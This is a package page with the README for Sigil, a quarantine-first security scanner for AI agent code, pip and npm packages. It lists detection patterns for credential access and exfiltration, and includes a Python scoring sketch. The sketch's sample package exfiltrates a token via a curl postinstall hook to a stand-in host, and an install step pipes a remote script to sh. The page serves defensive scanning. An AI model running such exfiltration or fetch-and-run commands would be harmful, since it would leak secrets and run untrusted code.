JSPM

@nomarj/sigil

1.0.4
  • Downloads 13
  • License Apache-2.0

Automated security auditing for AI agent code - quarantine-first scanning for pip, npm, git repos, and MCP servers

Package Exports

    This package does not declare an exports field, so the exports above have been automatically detected and optimized by JSPM instead. If any package subpath is missing, it is recommended to post an issue to the original package (@nomarj/sigil) to support the "exports" field. If that is not possible, create a JSPM override to customize the exports field for this package.

    Readme

    SIGIL

    Automated security auditing for AI agent code

    A protective mark for every line of code.
    by NOMARK



    Sigil scans repositories, packages, MCP servers, skills, and agent tooling for malicious patterns before they reach your working environment. Nothing runs until it's been scanned, scored, and explicitly approved.

    The AI tooling ecosystem moves fast. Developers clone repos from tutorials, install MCP servers with 12 GitHub stars, and pull agent skills from Discord — all of which get direct access to API keys, databases, and cloud credentials. Traditional dependency scanners catch known CVEs but miss the real threat: intentionally malicious code designed to exfiltrate credentials, establish backdoors, or execute arbitrary commands via install hooks.

    Sigil fills this gap with a quarantine-first approach.

    Quick Install

    Homebrew (macOS/Linux):

    brew tap nomarj/tap
    brew install sigil

    npm (All platforms):

    npm install -g @nomark/sigil

    Cargo (Rust):

    cargo install sigil

    curl installer:

    curl -sSL https://sigilsec.ai/install.sh | sh

    Docker:

    docker pull nomark/sigil:latest
    docker run --rm -v "$(pwd)":/workspace nomark/sigil scan .

    → See all installation methods

    How It Works

    ┌──────────────┐     ┌──────────────┐     ┌──────────────┐
    │  You run a   │────▶│  Sigil       │────▶│  Clean?      │
    │  command     │     │  quarantines │     │  Approve.    │
    │              │     │  & scans     │     │  Dirty?      │
    │  gclone      │     │              │     │  Reject.     │
    │  safepip     │     │  6 phases.   │     │              │
    │  safenpm     │     │  <3 seconds. │     │  You decide. │
    └──────────────┘     └──────────────┘     └──────────────┘

    Sigil runs six analysis phases on every scan:

    | Phase | What It Catches |
    |---|---|
    | Install Hooks | setup.py cmdclass, npm postinstall, Makefile targets that execute on install |
    | Code Patterns | eval(), exec(), pickle.loads, child_process, dynamic imports |
    | Network / Exfil | Outbound HTTP, webhooks, socket connections, DNS tunnelling |
    | Credentials | ENV var access, .aws, .kube, SSH keys, API key patterns |
    | Obfuscation | Base64 decode, charCode, hex encoding, minified payloads |
    | Provenance | Git history depth, author count, binary files, hidden files |

    Each finding is weighted and scored. You get a clear verdict:

    | Score | Verdict | What Happens |
    |---|---|---|
    | 0 | CLEAN | Auto-approve (configurable) |
    | 1–9 | LOW RISK | Approve with review |
    | 10–24 | MEDIUM RISK | Manual review required |
    | 25–49 | HIGH RISK | Blocked, requires override |
    | 50+ | CRITICAL | Blocked, no override |
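
A sketch of how weighted findings can roll up into the verdicts above, added here as an illustration and not taken from Sigil's code. The rule weights and regexes are hypothetical simplifications covering five of the six phases; only the verdict bands come from the table.

```python
import json
import re

# Hypothetical weights and simplified regexes; the page gives neither.
RULES = [
    ("install-hooks", 10, re.compile(r"cmdclass\s*=")),
    ("code-patterns", 5, re.compile(r"\b(?:eval|exec)\s*\(|pickle\.loads|child_process")),
    ("network-exfil", 3, re.compile(r"https?://|\bsocket\.")),
    ("credentials", 2, re.compile(r"os\.environ|process\.env|\.aws/|\.kube/|id_rsa")),
    ("obfuscation", 5, re.compile(r"b64decode|fromCharCode|atob\(")),
]
# Verdict bands from the table above, as (lowest score, verdict).
BANDS = [(50, "CRITICAL"), (25, "HIGH RISK"), (10, "MEDIUM RISK"),
         (1, "LOW RISK"), (0, "CLEAN")]

def npm_hook_findings(path, text):
    """Flag npm lifecycle scripts, which run automatically on install."""
    if not path.endswith("package.json"):
        return []
    try:
        scripts = json.loads(text).get("scripts") or {}
    except (ValueError, AttributeError):
        return [("install-hooks", 10, path, "unparseable package.json")]
    return [("install-hooks", 10, path, name)
            for name in ("preinstall", "install", "postinstall") if name in scripts]

def scan(files):
    """files maps path -> text; returns (score, verdict, findings)."""
    findings = []
    for path, text in files.items():
        findings += npm_hook_findings(path, text)
        for phase, weight, rx in RULES:
            findings += [(phase, weight, path, m.group(0)) for m in rx.finditer(text)]
    score = sum(weight for _, weight, _, _ in findings)
    verdict = next(name for floor, name in BANDS if score >= floor)
    return score, verdict, findings

# Constructed sample package: a postinstall hook whose script reads an
# environment variable and contacts a remote host.
SAMPLE = {
    "package.json": '{"name": "demo", "scripts": {"postinstall": "node setup.js"}}',
    "setup.js": 'const cp = require("child_process");\n'
                'cp.exec("curl -d " + process.env.DEMO_TOKEN + " https://collector.example/x");\n',
}

if __name__ == "__main__":
    score, verdict, findings = scan(SAMPLE)
    for phase, weight, path, match in findings:
        print(f"{phase:14} +{weight:<3} {path}: {match}")
    print(f"score={score} verdict={verdict}")
```

No single rule here reaches the blocking band on its own; the sample lands in HIGH RISK because the install hook, process execution, environment access and outbound URL findings add up.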

    Usage

    Core Commands

    # Clone a repo into quarantine, scan it, get a verdict
    sigil clone https://github.com/someone/cool-mcp-server
    
    # Download and scan a pip package before installing
    sigil pip some-agent-toolkit
    
    # Download and scan an npm package before installing
    sigil npm langchain-community-plugin
    
    # Scan a directory or file already on disk
    sigil scan ./downloaded-skill/
    
    # Download and scan any URL
    sigil fetch https://example.com/agent-tool.tar.gz
    
    # Manage quarantine
    sigil list              # See all quarantined items
    sigil approve abc123    # Move approved code out of quarantine
    sigil reject abc123     # Permanently delete quarantined code

    Shell Aliases

    After running sigil install, these aliases are available in every terminal session. Use the commands you already know — Sigil protects you automatically:

    | Alias | What It Does |
    |---|---|
    | gclone <url> | git clone with quarantine + scan |
    | safepip <pkg> | pip install with scan first |
    | safenpm <pkg> | npm install with scan first |
    | safefetch <url> | Download + quarantine + scan |
    | audithere | Scan current directory |
    | qls | Quarantine status |
    | qapprove / qreject | Approve or reject most recent item |

    Git Hooks

    # Auto-scan any repo on clone (global git hook)
    sigil install --git-hooks

    IDE & Agent Integrations

    Sigil works where you work. Install the plugin for your editor, or connect AI agents via MCP:

    | Integration | Coverage | Install |
    |---|---|---|
    | VS Code / Cursor / Windsurf | Scan workspace, files, selections, packages. Findings in Problems panel. | plugins/vscode |
    | JetBrains IDEs | IntelliJ, WebStorm, PyCharm, GoLand, CLion, etc. Tool window + inline annotations. | plugins/jetbrains |
    | Claude Code (MCP) | 6 tools: scan, scan_package, clone, quarantine, approve, reject. | plugins/mcp-server |
    | GitHub Actions | Run Sigil as a CI check on every PR. | action.yml |

    {
      "mcpServers": {
        "sigil": {
          "command": "node",
          "args": ["/path/to/sigil/plugins/mcp-server/dist/index.js"]
        }
      }
    }

    Build the MCP server first if you haven't already:

    cd plugins/mcp-server && npm install && npm run build

    npx @nomark/sigil-mcp-server will be available once the package is published to npm.

    Threat Intelligence

    When authenticated (sigil login), Sigil connects to a community-powered threat intelligence database. Every scan from every user contributes anonymised pattern data. When someone flags a malicious package, the threat signature propagates to all users within minutes.

    No source code is ever transmitted — only pattern match metadata (which rules triggered, file types, risk scores).

    Offline mode: All six scan phases run locally without authentication. Threat intelligence lookups are skipped, but you still get full local analysis.

    # Authenticate to enable threat intel
    sigil login

    Learn more about authentication →

    Why Not [Existing Tool]?

    Capability Sigil Snyk Socket.dev Semgrep CodeQL
    Quarantine workflow
    AI agent / MCP focus Partial
    Install hook scanning
    Credential exfil detection Partial Rules needed Rules needed
    Multi-ecosystem (pip, npm, git, URL) npm only Any (rules) GitHub only
    Community threat intel Advisory DB Community
    Free tier with full CLI Limited Limited OSS free Public repos

    Snyk and Dependabot flag known CVEs in dependency trees — they don't scan source code for intentional malice. Socket.dev is npm-only. Semgrep is a pattern engine, not an end-to-end workflow. CodeQL requires GitHub hosting. None of them quarantine code before it runs.

    Pricing

    The CLI is free and open source with all six scan phases. Paid tiers add cloud-backed threat intelligence, scan history, team management, and CI/CD integration.

    Open Source Pro — $29/mo Team — $99/mo
    Full CLI scanning
    Cloud threat intelligence
    Scan history 90 days 1 year
    Web dashboard
    Team management & policies Up to 25 seats
    CI/CD integration
    Slack / webhook alerts

    See full pricing →

    Documentation

    Comprehensive documentation is available in the docs/ directory:

    Getting Started:

    Technical Deep Dives:

    Integration Guides:

    Security Research:

    Browse all documentation →

    Roadmap

    See ROADMAP.md for the full roadmap.

    Today: Quarantine-first scanning for pip, npm, and git repos. Six-phase behavioral detection. Cloud threat intelligence with community reporting and signature sync. Dashboard with scan history, team management, and policy controls. Rust CLI binary, VS Code / Cursor / Windsurf extension (.vsix), JetBrains plugin, MCP server for AI agents, and GitHub Actions integration.

    Now: Hosted cloud — sign up and scan without running infrastructure.

    Next: Homebrew tap and npm package. Docker image and Go/Cargo scanning. VS Code Marketplace and JetBrains Marketplace listings. Custom scan rules via YAML. Enterprise SSO, RBAC, and audit logs. GitLab, Jenkins, and CircleCI integrations.

    Contributing

    We welcome contributions. See CONTRIBUTING.md for guidelines.

    Security

    Found a vulnerability? Please report it responsibly. See SECURITY.md.

    License

    Apache 2.0 — see LICENSE for details.

